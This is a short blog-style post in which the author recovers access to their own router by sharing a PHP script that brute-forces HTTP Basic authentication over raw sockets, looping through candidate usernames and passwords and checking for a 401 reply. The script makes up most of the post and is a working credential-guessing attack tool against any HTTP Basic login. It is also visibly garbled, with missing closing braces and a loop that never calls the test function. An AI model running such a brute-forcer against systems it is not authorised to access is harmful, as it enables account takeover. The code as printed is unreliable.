Hacking into my router by brute-forcing http authentication
I forgot the username and password to access the web panel of my router.
Luckily I knew some possible usernames and some patterns that I could have used to construct my password, so I just had to try all the combinations... Too much work to do manually but easily done when scripted.
Here is the php script that I came up with. (obviously stripped of my personal stuff). It got my account in less then a second :)
DISCLAIMER: Don't use this code for anything illegal! I'm not responsible for what you do with this!
$host = '';
$port = '';
$url = '/';
$users = array();
$passes = array();
foreach($users as $user) {
foreach($passes as $pass) {
function tryme($host,$url = '/',$port = 80, $user = null,$pass =null ) {
if(tryAccess($host,$url,$port, $user,$pass)) $result="SUCCESS";
if($user && $pass) $userpass = "user $user pass $pass ";
else $userpass = " without username & password";
echo("Tried $userpass > $result\n");
function tryAccess($host,$url = '/',$port = 80, $user = null,$pass =null) {
$fp = @fsockopen ($host, $port, &$errno, &$errdesc);
if (!is_resource ($fp)) {
echo("Could't not open socket to server: $errno - $errdesc\n");
return false;
@fputs ($fp, "POST $url HTTP/1.1\r\n");
@fputs ($fp, "Host: $host\r\n");
@fputs ($fp, "Connection: close\r\n");
if($user && $pass) {
@fputs ($fp, "Authorization: Basic " . base64_encode ("$user:$pass") . "\r\n");
$reply = '';
$success = true;
while (!@feof ($fp)) {
$line = @fgets ($fp, 1024);
if(strpos($line,'401 Unauthorized')) $success = false;
$reply .= $line;
@fclose ($fp);
return $success;